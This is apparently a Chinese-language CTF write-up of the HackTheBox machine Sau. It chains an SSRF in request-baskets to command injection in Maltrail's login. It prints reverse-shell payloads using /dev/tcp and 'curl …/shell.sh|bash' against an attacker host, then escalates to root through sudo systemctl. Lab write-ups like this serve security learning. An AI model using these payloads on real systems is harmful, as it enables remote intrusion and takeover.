[渗透测试学习] Sau - HackTheBox

首先是信息搜集，nmap扫一下

nmap -sV -sC -p- -v 10.10.11.224 

发现存在两个端口，55555端口有http服务，访问一下

获得线索request-baskets版本为1.2.1，搜索发现存在漏洞
那么我们试试构造ssrf，create的时候bp抓包
构造参考

直接访问http://10.10.11.224:55555/exp即可
（不过只是执行了url请求，没有内容。要想有内容把proxy_response设置为true就行）

我们这里直接按照步骤来（不抓包）

创建后打开点击设置，写入ssrf的url
然后访问给的路径即可

发现是Maltrail服务，还有版本号0.53
参考文章

/login路径下存在远程执行漏洞，构造如下

username=;`bash%20-i%20%3E&%20/dev/tcp/10.10.14.32/1028%200%3E&1`

不过没弹成功，换成curl去弹
在本地创建shell.sh，写入

bash -i >& /dev/tcp/10.10.14.32/1028 0>&1

开启服务器

python3 -m http.server 80

然后nc开启监听，bp构造payload

username=;`curl 10.10.14.32/shell.sh|bash`

成功反弹shell，找到user的flag

我们ls看一下发现有conf配置文件
我们cat一下，得到信息admin和local的密码

sha256解密发现就是注释给的

我们查看下能用的命令

sudo -l

发现有/usr/bin/systemctl status trail.service可以用，搜一下相关提权方式
用第三个（多简单）
先提升交互权限

python3 -c 'import pty;pty.spawn("/bin/bash")'

然后执行

sudo systemctl status trail.service

再输入!sh得到root权限
得到root的flag